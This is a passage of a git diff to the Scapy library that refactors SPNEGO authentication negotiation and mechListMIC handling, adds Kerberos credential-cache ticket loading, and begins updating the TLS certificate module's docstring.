SPNEGO_negToken(ASN1_Packet): def mechListMIC(oids): """ Implementation of RFC 4178 - Appendix D. mechListMIC Computation + + NOTE: The documentation on mechListMIC isn't super clear, so note that: + + - The mechListMIC that the client sends is computed over the + list of mechanisms that it requests. + - the mechListMIC that the server sends is computed over the + list of mechanisms that the client requested. + + This also means that NegTokenInit2 added by [MS-SPNG] is NOT protected. + That's not necessarily an issue, since it was optional in most cases, + but it's something to keep in mind. """ return bytes(SPNEGO_MechTypes(mechTypes=oids)) @@ -528,105 +547,160 @@ class SPNEGOSSP(SSP): """ __slots__ = [ - "supported_ssps", - "force_supported_mechtypes", + "ssps", ] + auth_type = 0x09 class STATE(SSP.STATE): FIRST = 1 - CHANGESSP = 2 - NORMAL = 3 + SUBSEQUENT = 2 class CONTEXT(SSP.CONTEXT): __slots__ = [ - "supported_mechtypes", - "requested_mechtypes", "req_flags", - "negotiated_mechtype", + "ssps", + "other_mechtypes", + "sent_mechtypes", "first_choice", - "sub_context", + "require_mic", + "verified_mic", "ssp", + "ssp_context", + "ssp_mechtype", + "raw", ] def __init__( - self, supported_ssps, req_flags=None, force_supported_mechtypes=None + self, + ssps: List[SSP], + req_flags=None, ): self.state = SPNEGOSSP.STATE.FIRST - self.requested_mechtypes = None self.req_flags = req_flags - self.first_choice = True - self.negotiated_mechtype = None - self.sub_context = None + # Information used during negotiation + self.ssps = ssps + self.other_mechtypes = None # the mechtypes our peer requested + self.sent_mechtypes = None # the mechtypes we sent when acting as a client + self.first_choice = True # whether the SSP was the peer's first choice + self.require_mic = False # whether the mechListMIC is required or not + self.verified_mic = False # whether mechListMIC has been verified + # Information about the currently selected SSP self.ssp = None - if force_supported_mechtypes is None: - self.supported_mechtypes = [ - SPNEGO_MechType(oid=ASN1_OID(oid)) for oid in supported_ssps - ] - self.supported_mechtypes.sort( - key=lambda x: SPNEGOSSP._PREF_ORDER.index(x.oid.val) - ) - else: - self.supported_mechtypes = force_supported_mechtypes + self.ssp_context = None + self.ssp_mechtype = None + self.raw = False # fallback to raw SSP super(SPNEGOSSP.CONTEXT, self).__init__() + # This is the order Windows chooses + _PREF_ORDER = [ + "1.2.840.113554.1.2.2.3", # Kerberos 5 - User to User + "1.2.840.48018.1.2.2", # MS KRB5 + "1.2.840.113554.1.2.2", # Kerberos 5 + "1.3.6.1.4.1.311.2.2.30", # NEGOEX + "1.3.6.1.4.1.311.2.2.10", # NTLM + ] + + def get_supported_mechtypes(self): + """ + Return an ordered list of mechtypes that are still available. + """ + # 1. Build mech list + mechs = [] + for ssp in self.ssps: + mechs.extend(ssp.GSS_Inquire_names_for_mech()) + + # 2. Sort according to the preference order. + mechs.sort(key=lambda x: self._PREF_ORDER.index(x)) + + # 3. Return wrapped in MechType + return [SPNEGO_MechType(oid=ASN1_OID(oid)) for oid in mechs] + + def negotiate_ssp(self) -> None: + """ + Perform SSP negotiation. + + This updates our context and sets it with the first SSP that is + common to both client and server. This also applies rules from + [MS-SPNG] and RFC4178 to determine if mechListMIC is required. + """ + if self.other_mechtypes is None: + # We don't have any information about the peer's preferred SSPs. + # This typically happens on client side, when NegTokenInit2 isn't used. + self.ssp = self.ssps[0] + ssp_oid = self.ssp.GSS_Inquire_names_for_mech()[0] + else: + # Get first common SSP between us and our peer + other_oids = [x.oid.val for x in self.other_mechtypes] + try: + self.ssp, ssp_oid = next( + (ssp, requested_oid) + for requested_oid in other_oids + for ssp in self.ssps + if requested_oid in ssp.GSS_Inquire_names_for_mech() + ) + except StopIteration: + raise ValueError( + "Could not find a common SSP with the remote peer !" + ) + + # Check whether the selected SSP was the one preferred by the client + self.first_choice = ssp_oid == other_oids[0] + + # Check whether mechListMIC is mandatory for this exchange + if not self.first_choice: + # RFC4178 rules for mechListMIC: mandatory if not the first choice. + self.require_mic = True + elif ssp_oid == "1.3.6.1.4.1.311.2.2.10" and self.ssp.SupportsMechListMIC(): + # [MS-SPNG] note 8: "If NTLM authentication is most preferred by + # the client and the server, and the client includes a MIC in + # AUTHENTICATE_MESSAGE, then the mechListMIC field becomes + # mandatory" + self.require_mic = True + + # Get the associated ssp dissection class and mechtype + self.ssp_mechtype = SPNEGO_MechType(oid=ASN1_OID(ssp_oid)) + + # Reset the ssp context + self.ssp_context = None + # Passthrough attributes and functions def clifailure(self): - self.sub_context.clifailure() + if self.ssp_context is not None: + self.ssp_context.clifailure() def __getattr__(self, attr): try: return object.__getattribute__(self, attr) except AttributeError: - return getattr(self.sub_context, attr) + return getattr(self.ssp_context, attr) def __setattr__(self, attr, val): try: return object.__setattr__(self, attr, val) except AttributeError: - return setattr(self.sub_context, attr, val) + return setattr(self.ssp_context, attr, val) # Passthrough the flags property @property def flags(self): - if self.sub_context: - return self.sub_context.flags + if self.ssp_context: + return self.ssp_context.flags return GSS_C_FLAGS(0) @flags.setter def flags(self, x): - if not self.sub_context: + if not self.ssp_context: return - self.sub_context.flags = x + self.ssp_context.flags = x def __repr__(self): - return "SPNEGOSSP[%s]" % repr(self.sub_context) - - _MECH_ALIASES = { - # Kerberos has 2 ssps - "1.2.840.48018.1.2.2": "1.2.840.113554.1.2.2", - "1.2.840.113554.1.2.2": "1.2.840.48018.1.2.2", - } - - # This is the order Windows chooses. We mimic it for plausibility - _PREF_ORDER = [ - "1.2.840.48018.1.2.2", # MS KRB5 - "1.2.840.113554.1.2.2", # Kerberos 5 - "1.3.6.1.4.1.311.2.2.30", # NEGOEX - "1.3.6.1.4.1.311.2.2.10", # NTLM - ] + return "SPNEGOSSP[%s]" % repr(self.ssp_context) - def __init__(self, ssps, **kwargs): - self.supported_ssps = {x.oid: x for x in ssps} - # Apply MechTypes aliases - for ssp in ssps: - if ssp.oid in self._MECH_ALIASES: - self.supported_ssps[self._MECH_ALIASES[ssp.oid]] = self.supported_ssps[ - ssp.oid - ] - self.force_supported_mechtypes = kwargs.pop("force_supported_mechtypes", None) + def __init__(self, ssps: List[SSP], **kwargs): + self.ssps = ssps super(SPNEGOSSP, self).__init__(**kwargs) @classmethod @@ -640,8 +714,11 @@ def from_cli_arguments( HashAes128Sha96: bytes = None, kerberos_required: bool = False, ST=None, + TGT=None, KEY=None, + ccache: str = None, debug: int = 0, + use_krb5ccname: bool = False, ): """ Initialize a SPNEGOSSP from a list of many arguments. @@ -655,8 +732,12 @@ def from_cli_arguments( :param HashAes256Sha96: (bytes) if provided, used for auth (Kerberos) :param HashAes128Sha96: (bytes) if provided, used for auth (Kerberos) :param ST: if provided, the service ticket to use (Kerberos) + :param TGT: if provided, the TGT to use (Kerberos) :param KEY: if ST provided, the session key associated to the ticket (Kerberos). - Else, the user secret key. + This can be either for the ST or TGT. Else, the user secret key. + :param ccache: (str) if provided, a path to a CCACHE (Kerberos) + :param use_krb5ccname: (bool) if true, the KRB5CCNAME environment variable will + be used if available. """ kerberos = True hostname = None @@ -664,11 +745,9 @@ def from_cli_arguments( if ":" in target: if not valid_ip6(target): hostname = target - target = str(Net6(target)) else: if not valid_ip(target): hostname = target - target = str(Net(target)) # Check UPN try: @@ -680,6 +759,10 @@ def from_cli_arguments( # not a UPN: NTLM only kerberos = False + # If we're asked, check the environment for KRB5CCNAME + if use_krb5ccname and ccache is None and "KRB5CCNAME" in os.environ: + ccache = os.environ["KRB5CCNAME"] + # Do we need to ask the password? if all( x is None @@ -689,6 +772,7 @@ def from_cli_arguments( HashNt, HashAes256Sha96, HashAes128Sha96, + ccache, ] ): # yes. @@ -700,7 +784,44 @@ def from_cli_arguments( # Kerberos if kerberos and hostname: # Get ticket if we don't already have one. - if ST is None: + if ST is None and TGT is None and ccache is not None: + # In this case, load the KerberosSSP from ccache + from scapy.modules.ticketer import Ticketer + + # Import into a Ticketer object + t = Ticketer() + t.open_ccache(ccache) + + # Look for the ticket that we'll use. We chose: + # - either a ST if the SPN matches our target + # - else a TGT if we got nothing better + tgts = [] + for i, (tkt, key, upn, spn) in enumerate(t.iter_tickets()): + spn, _ = _parse_spn(spn) + spn_host = spn.split("/")[-1] + # Check that it's for the correct user + if upn.lower() == UPN.lower(): + # Check that it's either a TGT or a ST to the correct service + if spn.lower().startswith("krbtgt/"): + # TGT. Keep it, and see if we don't have a better ST. + tgts.append(t.ssp(i)) + elif hostname.lower() == spn_host.lower(): + # ST. We're done ! + ssps.append(t.ssp(i)) + break + else: + # No ST found + if tgts: + # Using a TGT ! + ssps.append(tgts[0]) + else: + # Nothing found + t.show() + raise ValueError( + f"Could not find a ticket for {upn}, either a " + f"TGT or towards {hostname}" + ) + elif ST is None and TGT is None: # In this case, KEY is supposed to be the user's key. from scapy.libs.rfc3961 import Key, EncryptionType @@ -734,6 +855,7 @@ def from_cli_arguments( KerberosSSP( UPN=UPN, ST=ST, + TGT=TGT, KEY=KEY, debug=debug, ) @@ -748,68 +870,33 @@ def from_cli_arguments( if not kerberos_required: if HashNt is None and password is not None: HashNt = MD4le(password) - ssps.append(NTLMSSP(UPN=UPN, HASHNT=HashNt)) + if HashNt is not None: + ssps.append(NTLMSSP(UPN=UPN, HASHNT=HashNt)) + + if not ssps: + raise ValueError("Unexpected case ! Please report.") # Build the SSP return cls(ssps) - def _extract_gssapi(self, Context, x): - status, otherMIC, rawToken = None, None, False - # Extract values from GSSAPI - if isinstance(x, GSSAPI_BLOB): - x = x.innerToken - if isinstance(x, SPNEGO_negToken): - x = x.token - if hasattr(x, "mechTypes"): - Context.requested_mechtypes = x.mechTypes - Context.negotiated_mechtype = None - if hasattr(x, "supportedMech") and x.supportedMech is not None: - Context.negotiated_mechtype = x.supportedMech - if hasattr(x, "mechListMIC") and x.mechListMIC: - otherMIC = GSSAPI_BLOB_SIGNATURE(x.mechListMIC.value.val) - if hasattr(x, "_mechListMIC") and x._mechListMIC: - otherMIC = GSSAPI_BLOB_SIGNATURE(x._mechListMIC.value.val) - if hasattr(x, "negResult"): - status = x.negResult - try: - x = x.mechToken - except AttributeError: - try: - x = x.responseToken - except AttributeError: - # No GSSAPI wrapper (windows fallback). Remember this for answer - rawToken = True - if isinstance(x, SPNEGO_Token): - x = x.value - if Context.requested_mechtypes: - try: - cls = _mechDissector[ - ( - Context.negotiated_mechtype or Context.requested_mechtypes[0] - ).oid.val # noqa: E501 - ] - except KeyError: - cls = conf.raw_layer - if isinstance(x, ASN1_STRING): - x = cls(x.val) - elif isinstance(x, conf.raw_layer): - x = cls(x.load) - return x, status, otherMIC, rawToken - def NegTokenInit2(self): """ Server-Initiation of GSSAPI/SPNEGO. See [MS-SPNG] sect 3.2.5.2 """ - Context = self.CONTEXT( - self.supported_ssps, - force_supported_mechtypes=self.force_supported_mechtypes, - ) + Context = SPNEGOSSP.CONTEXT(list(self.ssps)) return ( Context, GSSAPI_BLOB( innerToken=SPNEGO_negToken( - token=SPNEGO_negTokenInit(mechTypes=Context.supported_mechtypes) + token=SPNEGO_negTokenInit( + mechTypes=Context.get_supported_mechtypes(), + negHints=SPNEGO_negHints( + hintName=ASN1_GENERAL_STRING( + "not_defined_in_RFC4178@please_ignore" + ), + ), + ) ) ), ) @@ -830,320 +917,374 @@ def NegTokenInit2(self): def GSS_WrapEx(self, Context, *args, **kwargs): # Passthrough - return Context.ssp.GSS_WrapEx(Context.sub_context, *args, **kwargs) + return Context.ssp.GSS_WrapEx(Context.ssp_context, *args, **kwargs) def GSS_UnwrapEx(self, Context, *args, **kwargs): # Passthrough - return Context.ssp.GSS_UnwrapEx(Context.sub_context, *args, **kwargs) + return Context.ssp.GSS_UnwrapEx(Context.ssp_context, *args, **kwargs) def GSS_GetMICEx(self, Context, *args, **kwargs): # Passthrough - return Context.ssp.GSS_GetMICEx(Context.sub_context, *args, **kwargs) + return Context.ssp.GSS_GetMICEx(Context.ssp_context, *args, **kwargs) def GSS_VerifyMICEx(self, Context, *args, **kwargs): # Passthrough - return Context.ssp.GSS_VerifyMICEx(Context.sub_context, *args, **kwargs) + return Context.ssp.GSS_VerifyMICEx(Context.ssp_context, *args, **kwargs) def LegsAmount(self, Context: CONTEXT): return 4 - def _common_spnego_handler( + def MapStatusToNegState(self, status: int) -> int: + """ + Map a GSSAPI return code to SPNEGO negState codes + """ + if status == GSS_S_COMPLETE: + return 0 # accept_completed + elif status == GSS_S_CONTINUE_NEEDED: + return 1 # accept_incomplete + else: + return 2 # reject + + def GuessOtherMechtypes(self, Context: CONTEXT, input_token): + """ + Guesses the mechtype of the peer when the "raw" fallback is used. + """ + if isinstance(input_token, NTLM_Header): + Context.other_mechtypes = [ + SPNEGO_MechType(oid=ASN1_OID("1.3.6.1.4.1.311.2.2.10")) + ] + elif isinstance(input_token, Kerberos): + Context.other_mechtypes = [ + SPNEGO_MechType(oid=ASN1_OID("1.2.840.48018.1.2.2")) + ] + else: + Context.other_mechtypes = [] + + def GSS_Init_sec_context( self, - Context, - IsClient, - token=None, + Context: CONTEXT, + input_token=None, target_name: Optional[str] = None, - req_flags=None, + req_flags: Optional[GSS_C_FLAGS] = None, chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, ): - """ - Common code shared across both GSS_sec_Init_Context and GSS_sec_Accept_Context - """ if Context is None: # New Context Context = SPNEGOSSP.CONTEXT( - self.supported_ssps, + list(self.ssps), req_flags=req_flags, - force_supported_mechtypes=self.force_supported_mechtypes, ) - if IsClient: - Context.requested_mechtypes = Context.supported_mechtypes - # Extract values from GSSAPI token - status, MIC, otherMIC, rawToken = 0, None, None, False - if token: - token, status, otherMIC, rawToken = self._extract_gssapi(Context, token) + input_token_inner = None + negState = None + + # Extract values from GSSAPI token, if present + if input_token is not None: + if isinstance(input_token, GSSAPI_BLOB): + input_token = input_token.innerToken + if isinstance(input_token, SPNEGO_negToken): + input_token = input_token.token + if isinstance(input_token, SPNEGO_negTokenInit): + # We are handling a NegTokenInit2 request ! + # Populate context with values from the server's request + Context.other_mechtypes = input_token.mechTypes + elif isinstance(input_token, SPNEGO_negTokenResp): + # Extract token and state from the client request + if input_token.responseToken is not None: + input_token_inner = input_token.responseToken.value + if input_token.negState is not None: + negState = input_token.negState + else: + # The blob is a raw token. We aren't using SPNEGO here. + Context.raw = True + input_token_inner = input_token + self.GuessOtherMechtypes(Context, input_token) - # If we don't have a SSP already negotiated, check for requested and available - # SSPs and find a common one. + # Perform SSP negotiation if Context.ssp is None: - if Context.negotiated_mechtype is None: - if Context.requested_mechtypes: - # Find a common SSP - try: - Context.negotiated_mechtype = next( - x - for x in Context.requested_mechtypes - if x in Context.supported_mechtypes - ) - except StopIteration: - # no common mechanisms - raise ValueError("No common SSP mechanisms !") - # Check whether the selected SSP was the one preferred by the client - if ( - Context.negotiated_mechtype != Context.requested_mechtypes[0] - and token - ): - Context.first_choice = False - # No SSPs were requested. Use the first available SSP we know. - elif Context.supported_mechtypes: - Context.negotiated_mechtype = Context.supported_mechtypes[0] - else: - raise ValueError("Can't figure out what SSP to use") - # Set Context.ssp to the object matching the chosen SSP type. - Context.ssp = self.supported_ssps[Context.negotiated_mechtype.oid.val] + try: + Context.negotiate_ssp() + except ValueError as ex: + # Couldn't find common SSP + log_runtime.warning("SPNEGOSSP: %s" % ex) + return Context, None, GSS_S_BAD_MECH + + # Call inner-SSP + Context.ssp_context, output_token_inner, status = ( + Context.ssp.GSS_Init_sec_context( + Context.ssp_context, + input_token=input_token_inner, + target_name=target_name, + req_flags=Context.req_flags, + chan_bindings=chan_bindings, + ) + ) - if not Context.first_choice: - # The currently provided token is not for this SSP ! - # Typically a client opportunistically starts with Kerberos, including - # its APREQ, and we want to use NTLM. We add one round trip - Context.state = SPNEGOSSP.STATE.FIRST - Context.first_choice = True # reset to not come here again. - tok, status = None, GSS_S_CONTINUE_NEEDED - else: - # The currently provided token is for this SSP ! - # Pass it to the sub ssp, with its own context - if IsClient: - Context.sub_context, tok, status = Context.ssp.GSS_Init_sec_context( - Context.sub_context, - token=token, + if negState == 2 or status not in [GSS_S_COMPLETE, GSS_S_CONTINUE_NEEDED]: + # SSP failed. Remove it from the list of SSPs we're currently running + Context.ssps.remove(Context.ssp) + log_runtime.warning( + "SPNEGOSSP: %s failed. Retrying with next in queue." % repr(Context.ssp) + ) + + if Context.ssps: + # We have other SSPs remaining. Retry using another one. + Context.ssp = None + return self.GSS_Init_sec_context( + Context, + None, # No input for retry. target_name=target_name, - req_flags=Context.req_flags, + req_flags=req_flags, chan_bindings=chan_bindings, ) else: - Context.sub_context, tok, status = Context.ssp.GSS_Accept_sec_context( - Context.sub_context, - token=token, - req_flags=Context.req_flags, - chan_bindings=chan_bindings, - ) - # Check whether client or server says the specified mechanism is not valid - if status == GSS_S_BAD_MECH: - # Mechanism is not usable. Typically the Kerberos SPN is wrong - to_remove = [Context.negotiated_mechtype.oid.val] - # If there's an alias (for the multiple kerberos oids, also include it) - if Context.negotiated_mechtype.oid.val in SPNEGOSSP._MECH_ALIASES: - to_remove.append( - SPNEGOSSP._MECH_ALIASES[Context.negotiated_mechtype.oid.val] - ) - # Drop those unusable mechanisms from the supported list - for x in list(Context.supported_mechtypes): - if x.oid.val in to_remove: - Context.supported_mechtypes.remove(x) - break - # Re-calculate negotiated mechtype - try: - Context.negotiated_mechtype = next( - x - for x in Context.requested_mechtypes - if x in Context.supported_mechtypes - ) - except StopIteration: - # no common mechanisms - raise ValueError("No common SSP mechanisms after GSS_S_BAD_MECH !") - # Start again. - Context.state = SPNEGOSSP.STATE.CHANGESSP - Context.ssp = None # Reset the SSP - Context.sub_context = None # Reset the SSP context - if IsClient: - # Call ourselves again for the client to generate a token - return self._common_spnego_handler( - Context, - IsClient=True, - token=None, - req_flags=req_flags, - chan_bindings=chan_bindings, - ) - else: - # Return nothing but the supported SSP list - tok, status = None, GSS_S_CONTINUE_NEEDED - - if rawToken: - # No GSSAPI wrapper (fallback) - return Context, tok, status + # We don't have anything left + return Context, None, status + + # Raw processing ends here. + if Context.raw: + return Context, output_token_inner, status + + # Verify MIC if present. + if status == GSS_S_COMPLETE and input_token and input_token.mechListMIC: + # NOTE: the mechListMIC that the server sends is computed over the list of + # mechanisms that the **client requested**. + Context.ssp.VerifyMechListMIC( + Context.ssp_context, + input_token.mechListMIC.value, + mechListMIC(Context.sent_mechtypes), + ) + Context.verified_mic = True - # Client success - if IsClient and tok is None and status == GSS_S_COMPLETE: + if negState == 0 and status == GSS_S_COMPLETE: + # We are done. return Context, None, status + elif Context.state == SPNEGOSSP.STATE.FIRST: + # First freeze the list of available mechtypes on the first message + Context.sent_mechtypes = Context.get_supported_mechtypes() - # Map GSSAPI codes to SPNEGO - if status == GSS_S_COMPLETE: - negResult = 0 # accept_completed - elif status == GSS_S_CONTINUE_NEEDED: - negResult = 1 # accept_incomplete - else: - negResult = 2 # reject - - # GSSAPI-MIC - if Context.ssp and Context.ssp.canMechListMIC(Context.sub_context): - # The documentation on mechListMIC wasn't clear, so note that: - # - The mechListMIC that the client sends is computed over the - # list of mechanisms that it requests. - # - the mechListMIC that the server sends is computed over the - # list of mechanisms that the client requested. - # Yes, this does indeed mean that NegTokenInit2 added by [MS-SPNG] - # is NOT protected. That's not necessarily an issue, since it was - # optional in most cases, but it's something to keep in mind. - if otherMIC is not None: - # Check the received MIC if any - if IsClient: # from server - Context.ssp.verifyMechListMIC( - Context, - otherMIC, - mechListMIC(Context.supported_mechtypes), - ) - else: # from client - Context.ssp.verifyMechListMIC( - Context, - otherMIC, - mechListMIC(Context.requested_mechtypes), - ) - # Then build our own MIC - if IsClient: # client - if negResult == 0: - # Include MIC for the last packet. We could add a check - # here to only send the MIC when required (when preferred ssp - # isn't chosen) - MIC = Context.ssp.getMechListMIC( - Context, - mechListMIC(Context.supported_mechtypes), - ) - else: # server - MIC = Context.ssp.getMechListMIC( - Context, - mechListMIC(Context.requested_mechtypes), + # Now build the token + spnego_tok = GSSAPI_BLOB( + innerToken=SPNEGO_negToken( + token=SPNEGO_negTokenInit(mechTypes=Context.sent_mechtypes) ) + ) - if IsClient: - if Context.state == SPNEGOSSP.STATE.FIRST: - # First client token - spnego_tok = SPNEGO_negToken( - token=SPNEGO_negTokenInit(mechTypes=Context.supported_mechtypes) - ) - if tok: - spnego_tok.token.mechToken = SPNEGO_Token(value=tok) - else: - # Subsequent client tokens - spnego_tok = SPNEGO_negToken( # GSSAPI_BLOB is stripped - token=SPNEGO_negTokenResp( - supportedMech=None, - negResult=None, - ) + # Add the output token if provided + if output_token_inner is not None: + spnego_tok.innerToken.token.mechToken = SPNEGO_Token( + value=output_token_inner, ) - if tok: - spnego_tok.token.responseToken = SPNEGO_Token(value=tok) - if Context.state == SPNEGOSSP.STATE.CHANGESSP: - # On renegotiation, include the negResult and chosen mechanism - spnego_tok.token.negResult = negResult - spnego_tok.token.supportedMech = Context.negotiated_mechtype - else: - spnego_tok = SPNEGO_negToken( # GSSAPI_BLOB is stripped + elif Context.state == SPNEGOSSP.STATE.SUBSEQUENT: + # Build subsequent client tokens: without the list of supported mechtypes + # NOTE: GSSAPI_BLOB is stripped. + spnego_tok = SPNEGO_negToken( token=SPNEGO_negTokenResp( supportedMech=None, - negResult=negResult, + negState=None, ) ) - if Context.state in [SPNEGOSSP.STATE.FIRST, SPNEGOSSP.STATE.CHANGESSP]: - # Include the supportedMech list if this is the first thing we do - # or a renegotiation. - spnego_tok.token.supportedMech = Context.negotiated_mechtype - if tok: - spnego_tok.token.responseToken = SPNEGO_Token(value=tok) - # Apply MIC if available - if MIC: - spnego_tok.token.mechListMIC = SPNEGO_MechListMIC( - value=ASN1_STRING(MIC), - ) - if ( - IsClient and Context.state == SPNEGOSSP.STATE.FIRST - ): # Client: after the first packet, specifying 'SPNEGO' is implicit. - # Always implicit for the server. - spnego_tok = GSSAPI_BLOB(innerToken=spnego_tok) - # Not the first token anymore - Context.state = SPNEGOSSP.STATE.NORMAL + + # Add the MIC if required and the exchange is finished. + if status == GSS_S_COMPLETE and Context.require_mic: + spnego_tok.token.mechListMIC = SPNEGO_MechListMIC( + value=Context.ssp.GetMechListMIC( + Context.ssp_context, + mechListMIC(Context.sent_mechtypes), + ), + ) + + # If we still haven't verified the MIC, we aren't done. + if not Context.verified_mic: + status = GSS_S_CONTINUE_NEEDED + + # Add the output token if provided + if output_token_inner: + spnego_tok.token.responseToken = SPNEGO_Token( + value=output_token_inner, + ) + + # Update the state + Context.state = SPNEGOSSP.STATE.SUBSEQUENT + return Context, spnego_tok, status - def GSS_Init_sec_context( + def GSS_Accept_sec_context( self, Context: CONTEXT, - token=None, - target_name: Optional[str] = None, - req_flags: Optional[GSS_C_FLAGS] = None, + input_token=None, + req_flags: Optional[GSS_S_FLAGS] = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS, chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, ): - return self._common_spnego_handler( - Context, - True, - token=token, - target_name=target_name, - req_flags=req_flags, - chan_bindings=chan_bindings, + if Context is None: + # New Context + Context = SPNEGOSSP.CONTEXT( + list(self.ssps), + req_flags=req_flags, + ) + + input_token_inner = None + _mechListMIC = None + + # Extract values from GSSAPI token + if isinstance(input_token, GSSAPI_BLOB): + input_token = input_token.innerToken + if isinstance(input_token, SPNEGO_negToken): + input_token = input_token.token + if isinstance(input_token, SPNEGO_negTokenInit): + # Populate context with values from the client's request + if input_token.mechTypes: + Context.other_mechtypes = input_token.mechTypes + if input_token.mechToken: + input_token_inner = input_token.mechToken.value + _mechListMIC = input_token.mechListMIC or input_token._mechListMIC + elif isinstance(input_token, SPNEGO_negTokenResp): + if input_token.responseToken: + input_token_inner = input_token.responseToken.value + _mechListMIC = input_token.mechListMIC + else: + # The blob is a raw token. We aren't using SPNEGO here. + Context.raw = True + input_token_inner = input_token + self.GuessOtherMechtypes(Context, input_token) + + if Context.other_mechtypes is None: + # At this point, we should have already gotten the mechtypes from a current + # or former request. + return Context, None, GSS_S_FAILURE + + # Perform SSP negotiation + if Context.ssp is None: + try: + Context.negotiate_ssp() + except ValueError as ex: + # Couldn't find common SSP + log_runtime.warning("SPNEGOSSP: %s" % ex) + return Context, None, GSS_S_FAILURE + + output_token_inner = None + status = GSS_S_CONTINUE_NEEDED + + # If we didn't pick the client's first choice, the token we were passed + # isn't usable. + if not Context.first_choice: + # Typically a client opportunistically starts with Kerberos, including + # its APREQ, and we want to use NTLM. Here we add one round trip + Context.first_choice = True # Do not enter here again. + else: + # Send it to the negotiated SSP + Context.ssp_context, output_token_inner, status = ( + Context.ssp.GSS_Accept_sec_context( + Context.ssp_context, + input_token=input_token_inner, + req_flags=Context.req_flags, + chan_bindings=chan_bindings, + ) + ) + + # Verify MIC if context succeeded + if status == GSS_S_COMPLETE and _mechListMIC: + # NOTE: the mechListMIC that the client sends is computed over the + # **list of mechanisms that it requests**. + if Context.ssp.SupportsMechListMIC(): + # We need to check we support checking the MIC. The only case where + # this is needed is NTLM in guest mode: the client will send a mic + # but we don't check it... + Context.ssp.VerifyMechListMIC( + Context.ssp_context, + _mechListMIC.value, + mechListMIC(Context.other_mechtypes), + ) + Context.verified_mic = True + Context.require_mic = True + + # Raw processing ends here. + if Context.raw: + return Context, output_token_inner, status + + # 0. Build the template response token + spnego_tok = SPNEGO_negToken( + token=SPNEGO_negTokenResp( + supportedMech=None, + ) ) + if Context.state == SPNEGOSSP.STATE.FIRST: + # Include the supportedMech list if this is the first message we send + # or a renegotiation. + spnego_tok.token.supportedMech = Context.ssp_mechtype - def GSS_Accept_sec_context( + # Add the output token if provided + if output_token_inner: + spnego_tok.token.responseToken = SPNEGO_Token(value=output_token_inner) + + # Update the state + Context.state = SPNEGOSSP.STATE.SUBSEQUENT + + # Add the MIC if required and the exchange is finished. + if status == GSS_S_COMPLETE and Context.require_mic: + spnego_tok.token.mechListMIC = SPNEGO_MechListMIC( + value=Context.ssp.GetMechListMIC( + Context.ssp_context, + mechListMIC(Context.other_mechtypes), + ), + ) + + # If we still haven't verified the MIC, we aren't done. + if not Context.verified_mic: + status = GSS_S_CONTINUE_NEEDED + + # Set negState + spnego_tok.token.negState = self.MapStatusToNegState(status) + + return Context, spnego_tok, status + + def GSS_Passive( self, Context: CONTEXT, - token=None, - req_flags: Optional[GSS_S_FLAGS] = GSS_S_FLAGS.GSS_S_ALLOW_MISSING_BINDINGS, - chan_bindings: GssChannelBindings = GSS_C_NO_CHANNEL_BINDINGS, + input_token=None, + req_flags=None, ): - return self._common_spnego_handler( - Context, - False, - token=token, - req_flags=req_flags, - chan_bindings=chan_bindings, - ) - - def GSS_Passive(self, Context: CONTEXT, token=None, req_flags=None): if Context is None: # New Context - Context = SPNEGOSSP.CONTEXT(self.supported_ssps) + Context = SPNEGOSSP.CONTEXT(list(self.ssps)) Context.passive = True - # Extraction - token, status, _, rawToken = self._extract_gssapi(Context, token) + input_token_inner = None - if token is None and status == GSS_S_COMPLETE: - return Context, None - - # Just get the negotiated SSP - if Context.negotiated_mechtype: - mechtype = Context.negotiated_mechtype - elif Context.requested_mechtypes: - mechtype = Context.requested_mechtypes[0] - elif rawToken and Context.supported_mechtypes: - mechtype = Context.supported_mechtypes[0] - else: - return None, GSS_S_BAD_MECH - try: - ssp = self.supported_ssps[mechtype.oid.val] - except KeyError: - return None, GSS_S_BAD_MECH - - if Context.ssp is not None: - # Detect resets - if Context.ssp != ssp: - Context.ssp = ssp - Context.sub_context = None + # Extract values from GSSAPI token + if isinstance(input_token, GSSAPI_BLOB): + input_token = input_token.innerToken + if isinstance(input_token, SPNEGO_negToken): + input_token = input_token.token + if isinstance(input_token, SPNEGO_negTokenInit): + if input_token.mechTypes is not None: + Context.other_mechtypes = input_token.mechTypes + if input_token.mechToken: + input_token_inner = input_token.mechToken.value + elif isinstance(input_token, SPNEGO_negTokenResp): + if input_token.supportedMech is not None: + Context.other_mechtypes = [input_token.supportedMech] + if input_token.responseToken: + input_token_inner = input_token.responseToken.value else: - Context.ssp = ssp + # Raw. + input_token_inner = input_token + + if Context.other_mechtypes is None: + self.GuessOtherMechtypes(Context, input_token) + + # Uninitialized OR allowed mechtypes have changed + if Context.ssp is None or Context.ssp_mechtype not in Context.other_mechtypes: + try: + Context.negotiate_ssp() + except ValueError: + # Couldn't find common SSP + return Context, GSS_S_FAILURE # Passthrough - Context.sub_context, status = Context.ssp.GSS_Passive( - Context.sub_context, - token, + Context.ssp_context, status = Context.ssp.GSS_Passive( + Context.ssp_context, + input_token_inner, req_flags=req_flags, ) @@ -1151,8 +1292,8 @@ def GSS_Passive(self, Context: CONTEXT, token=None, req_flags=None): def GSS_Passive_set_Direction(self, Context: CONTEXT, IsAcceptor=False): Context.ssp.GSS_Passive_set_Direction( - Context.sub_context, IsAcceptor=IsAcceptor + Context.ssp_context, IsAcceptor=IsAcceptor ) def MaximumSignatureLength(self, Context: CONTEXT): - return Context.ssp.MaximumSignatureLength(Context.sub_context) + return Context.ssp.MaximumSignatureLength(Context.ssp_context) diff --git a/scapy/layers/tls/cert.py b/scapy/layers/tls/cert.py index b38f52ca073..4788c3d2a88 100644 --- a/scapy/layers/tls/cert.py +++ b/scapy/layers/tls/cert.py @@ -4,69 +4,156 @@ # Copyright (C) 2008 Arnaud Ebalard # # 2015, 2016, 2017 Maxence Tury +# 2022-2025 Gabriel Potter -""" -High-level methods for PKI objects (X.509 certificates, CRLs, asymmetric keys). -Supports both RSA and ECDSA objects. +r""" +High-level methods for PKI objects (X.509 certificates, CRLs, CSR, Keys, CMS). +Supported keys include RSA, ECDSA and EdDSA. The classes below are wrappers for the ASN.1 objects defined in x509.py. + +Example 1: Certificate & Private key +____________________________________ + For instance, here is what you could do in order to modify the subject public key info of a 'cert' and then resign it with whatever 'key':: - from scapy.layers.tls.cert import * - cert = Cert("cert.der") - k = PrivKeyRSA() # generate a private key - cert.setSubjectPublicKeyFromPrivateKey(k) - cert.resignWith(k) - cert.export("newcert.pem") - k.export("mykey.pem") + >>> from 